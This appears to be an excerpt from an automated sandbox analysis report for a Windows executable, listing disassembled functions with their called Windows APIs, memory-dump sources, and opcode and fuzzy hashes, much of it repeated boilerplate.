                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3947729631-0
                                                                                                                                                                          • Opcode ID: 4a2f43bead39ce058c557f5b4fc102bf9ea9cb7a759dd16a39b16621d9c8bbb2
                                                                                                                                                                          • Instruction ID: 834f6fa0254b2ac2620fbd65c83b92bf012167c3de7d9ca746b8d5c429d816ac
                                                                                                                                                                          • Opcode Fuzzy Hash: 4a2f43bead39ce058c557f5b4fc102bf9ea9cb7a759dd16a39b16621d9c8bbb2
                                                                                                                                                                          • Instruction Fuzzy Hash: 61419121F1978392FB25BB259CA037AA691EF44740FC8543AD94D87791DF3EE8448360
                                                                                                                                                                          Function 00007FF70ECE4EE4 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00007FF70ECD6288: FindClose.KERNELBASE(?,?,?,00007FF70ECDFFA5), ref: 00007FF70ECD62BD
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70ECE5023
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1011579015-0
                                                                                                                                                                          • Opcode ID: 84bb52c91770d470c5ce8fb11b36b646ca4ef6c9421ba636b31e3e2a86012136
                                                                                                                                                                          • Instruction ID: 438ad9d6503e63a058e187210686a62c1869d6d7091faf20e38983363ba67a28
                                                                                                                                                                          • Opcode Fuzzy Hash: 84bb52c91770d470c5ce8fb11b36b646ca4ef6c9421ba636b31e3e2a86012136
                                                                                                                                                                          • Instruction Fuzzy Hash: 5B318121B18B8691EA18BB15EC5537AF3A1FF84BD4F840135EAAD07B95CF3EE4418320
                                                                                                                                                                          Function 00007FF70ED046DC Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                          • Opcode ID: d0a039c216fd43f6ed93c381b723f8e0e858f96ef93bc530090e045798fe727a
                                                                                                                                                                          • Instruction ID: 38b01ceb8d24becea6887f52a9ca153a4f2fe8988de36d50afda20a13e3394a4
                                                                                                                                                                          • Opcode Fuzzy Hash: d0a039c216fd43f6ed93c381b723f8e0e858f96ef93bc530090e045798fe727a
                                                                                                                                                                          • Instruction Fuzzy Hash: 5111513691C68282F611AF159C44B79E6A4FF81384FD90535E7AD87B92DF7CE81087A0
                                                                                                                                                                          Function 00007FF70ECF376C Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00007FF70ECF2BF4: GetDlgItem.USER32 ref: 00007FF70ECF2C33
                                                                                                                                                                            • Part of subcall function 00007FF70ECF2BF4: ShowWindow.USER32 ref: 00007FF70ECF2C59
                                                                                                                                                                            • Part of subcall function 00007FF70ECF2BF4: SendMessageW.USER32 ref: 00007FF70ECF2C6E
                                                                                                                                                                            • Part of subcall function 00007FF70ECF2BF4: SendMessageW.USER32 ref: 00007FF70ECF2C86
                                                                                                                                                                            • Part of subcall function 00007FF70ECF2BF4: SendMessageW.USER32 ref: 00007FF70ECF2CA7
                                                                                                                                                                            • Part of subcall function 00007FF70ECF2BF4: SendMessageW.USER32 ref: 00007FF70ECF2CC3
                                                                                                                                                                            • Part of subcall function 00007FF70ECF2BF4: SendMessageW.USER32 ref: 00007FF70ECF2D06
                                                                                                                                                                            • Part of subcall function 00007FF70ECF2BF4: SendMessageW.USER32 ref: 00007FF70ECF2D24
                                                                                                                                                                            • Part of subcall function 00007FF70ECF2BF4: SendMessageW.USER32 ref: 00007FF70ECF2D38
                                                                                                                                                                            • Part of subcall function 00007FF70ECF2BF4: SendMessageW.USER32 ref: 00007FF70ECF2D62
                                                                                                                                                                            • Part of subcall function 00007FF70ECF2BF4: SendMessageW.USER32 ref: 00007FF70ECF2D7A
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70ECF3807
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$ItemShowWindow_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1587882848-0
                                                                                                                                                                          • Opcode ID: a17a2933a5598f223953b9eb131bb51ba67130e6c1500cc538cb9751c6f70893
                                                                                                                                                                          • Instruction ID: b701f0bd7d0a58dfef5cb8e00738ccc4c65ca1d88092a5a04d226c5d0cefca23
                                                                                                                                                                          • Opcode Fuzzy Hash: a17a2933a5598f223953b9eb131bb51ba67130e6c1500cc538cb9751c6f70893
                                                                                                                                                                          • Instruction Fuzzy Hash: 6301C8A2A1868562E914B725D85636FE311EF89790F900331E69D0ABD5DF3DD1408614
                                                                                                                                                                          Function 00007FF70ECD6288 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00007FF70ECD647C: FindFirstFileW.KERNELBASE ref: 00007FF70ECD64CB
                                                                                                                                                                            • Part of subcall function 00007FF70ECD647C: FindFirstFileW.KERNELBASE ref: 00007FF70ECD651E
                                                                                                                                                                            • Part of subcall function 00007FF70ECD647C: GetLastError.KERNEL32 ref: 00007FF70ECD656F
                                                                                                                                                                          • FindClose.KERNELBASE(?,?,?,00007FF70ECDFFA5), ref: 00007FF70ECD62BD
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1464966427-0
                                                                                                                                                                          • Opcode ID: 3b96e4bc9674b0bfe861db3a8d48e59cac22d33fe6a98766aeed1da261f7cc18
                                                                                                                                                                          • Instruction ID: b599e3f33b16b90ca27a1535eaf0fd505284f7a75b76986c18e056fccf8654f0
                                                                                                                                                                          • Opcode Fuzzy Hash: 3b96e4bc9674b0bfe861db3a8d48e59cac22d33fe6a98766aeed1da261f7cc18
                                                                                                                                                                          • Instruction Fuzzy Hash: 72F0286290C341A9DA10BB749905179B7609F1ABB4F540375DA7C072C7CF2BD445C724
                                                                                                                                                                          Function 00007FF70ECE00F0 Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemMessageSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3015471070-0
                                                                                                                                                                          • Opcode ID: 39a766f13ec939f6e1c3257cb9b2c56e534004cb78ff04812ec539a8ae924e80
                                                                                                                                                                          • Instruction ID: 5825892a758b03d184bf78e340d39c101be024786d34dc231299bbddf1eeba22
                                                                                                                                                                          • Opcode Fuzzy Hash: 39a766f13ec939f6e1c3257cb9b2c56e534004cb78ff04812ec539a8ae924e80
                                                                                                                                                                          • Instruction Fuzzy Hash: 6DD05E61F18286A2E620B321AC1977A9310AF91B84F900231DD8E1B7D1CF2ED2228654
                                                                                                                                                                          Function 00007FF70ECD8CF8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CurrentDirectory
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1611563598-0
                                                                                                                                                                          • Opcode ID: b7b94b84bc736c81f561ac6a0213732948c79a519d47e0e60c8097fcab4ddeb2
                                                                                                                                                                          • Instruction ID: ed3f3cc7f1fe65093bbf3ba8533533e1f92bfe5284fb3b6f91ec20eb80b89e44
                                                                                                                                                                          • Opcode Fuzzy Hash: b7b94b84bc736c81f561ac6a0213732948c79a519d47e0e60c8097fcab4ddeb2
                                                                                                                                                                          • Instruction Fuzzy Hash: BAC08C21F09602C2DA086B26DC8A21812A0FF51B04FA08035C10CC21A0DF2EC5AA8310
                                                                                                                                                                          Function 00007FF70ECD4E00 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 749574446-0
                                                                                                                                                                          • Opcode ID: 18013ed5b6161e60d067ba1f4f2b62e7c051905d9142b67b1a2e10f00f48d8d5
                                                                                                                                                                          • Instruction ID: 83484a500c6b11cb4aa8bad484ade203199e38a5711856b0f9081b92d537ce7c
                                                                                                                                                                          • Opcode Fuzzy Hash: 18013ed5b6161e60d067ba1f4f2b62e7c051905d9142b67b1a2e10f00f48d8d5
                                                                                                                                                                          • Instruction Fuzzy Hash: CEB09210B06541C2D6046B22DC822185324AB89B01BD88431C50DD2220CF1CC9EB9700
                                                                                                                                                                          Function 00007FF70ED02E94 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                          • Opcode ID: 973ac4a955278155064161a4d63dbe6b99ccc62035c0026a498718668b27418c
                                                                                                                                                                          • Instruction ID: 0220926a4f36c6a8ba878582dcfad581f36906b6dc1d8fea50dd04eeaad1e2ec
                                                                                                                                                                          • Opcode Fuzzy Hash: 973ac4a955278155064161a4d63dbe6b99ccc62035c0026a498718668b27418c
                                                                                                                                                                          • Instruction Fuzzy Hash: 13F04914B4A24386FE5976669D593BAD284DF88B80FCC1435C90EC77E3EF2CE4804234
                                                                                                                                                                          Function 00007FF70ED00E5C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                          • Opcode ID: 6cb8d6af9808862ce5c6d1e218701f51077bf56df55e472ff95833f18a2663ca
                                                                                                                                                                          • Instruction ID: 0eb860b5bd867f1415c8457a18c529da35bb9f418c75f5953f9d2a8dea56eb02
                                                                                                                                                                          • Opcode Fuzzy Hash: 6cb8d6af9808862ce5c6d1e218701f51077bf56df55e472ff95833f18a2663ca
                                                                                                                                                                          • Instruction Fuzzy Hash: 7DF0F850B1D247A5FA54B6B25C517B9A280CF897A1F8C4A34DCAED72C2DF2CB8808234
                                                                                                                                                                          Function 00007FF70ECD42D0 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                          • Opcode ID: 9c850ec0e91a3c36dd67a082f4f7d32c48f886c19389c1b26b24c46edd12351b
                                                                                                                                                                          • Instruction ID: b651c04e4c89275fb5a26b9828b87a1305cf92e52f482f8754287c1f8d70d817
                                                                                                                                                                          • Opcode Fuzzy Hash: 9c850ec0e91a3c36dd67a082f4f7d32c48f886c19389c1b26b24c46edd12351b
                                                                                                                                                                          • Instruction Fuzzy Hash: EFF08122A0C642A5EB289F28E84137AA660EF04B7AF884334D73C012D4DF3AD9958320

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 00007FF70ECDE91C Relevance: 43.2, APIs: 22, Strings: 2, Instructions: 1205COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
                                                                                                                                                                          • String ID: %ls$%s: %s
                                                                                                                                                                          • API String ID: 2539828978-2259941744
                                                                                                                                                                          • Opcode ID: 87ea6f5bcc4e1b3ad6ac3b10cad88529b6f4803ac2bf8d6679d8dd7104d9238e
                                                                                                                                                                          • Instruction ID: be81187ad9b85b916ee8a83a036f075dd2a35b11ad96127b6f4f19023efd856a
                                                                                                                                                                          • Opcode Fuzzy Hash: 87ea6f5bcc4e1b3ad6ac3b10cad88529b6f4803ac2bf8d6679d8dd7104d9238e
                                                                                                                                                                          • Instruction Fuzzy Hash: 0EB2B662A1D68261EA10BB25E8542BBE351FFC9790F90433AE69D47BD6DF2FE540C310
                                                                                                                                                                          Function 00007FF70ED059E0 Relevance: 22.3, APIs: 8, Strings: 4, Instructions: 1310COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfomemcpy_s
                                                                                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                          • API String ID: 1759834784-2761157908
                                                                                                                                                                          • Opcode ID: 9299a3169d015825bf4d3bc5b4bd651bd176d2d756bbc2b925d21ab17e7b8838
                                                                                                                                                                          • Instruction ID: 7de16e7afc42195ffb586bbc650a0504fdf31f8bbf3e7f7b55a79a74f3e55b44
                                                                                                                                                                          • Opcode Fuzzy Hash: 9299a3169d015825bf4d3bc5b4bd651bd176d2d756bbc2b925d21ab17e7b8838
                                                                                                                                                                          • Instruction Fuzzy Hash: C8B2F672A082828BE775AE25DC407FDB7A1FF84388F985135DA1A97F84DF39E5148B10
                                                                                                                                                                          Function 00007FF70ECD72AC Relevance: 12.3, APIs: 8, Instructions: 256COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1693479884-0
                                                                                                                                                                          • Opcode ID: a763a03e94ac9eb552bec9fcc4b44f4ad800b0a698e118a479ea2ebfada1421e
                                                                                                                                                                          • Instruction ID: 0980293dc8dd20d62a0a2fd97388b67803994e2285e5dffc2239393fb058ea04
                                                                                                                                                                          • Opcode Fuzzy Hash: a763a03e94ac9eb552bec9fcc4b44f4ad800b0a698e118a479ea2ebfada1421e
                                                                                                                                                                          • Instruction Fuzzy Hash: 58A1E262F18B5295FF00AB798C541BEA361AF44BE4B944236DE2D17BC8EF3EE441C210
                                                                                                                                                                          Function 00007FF70ECF6940 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
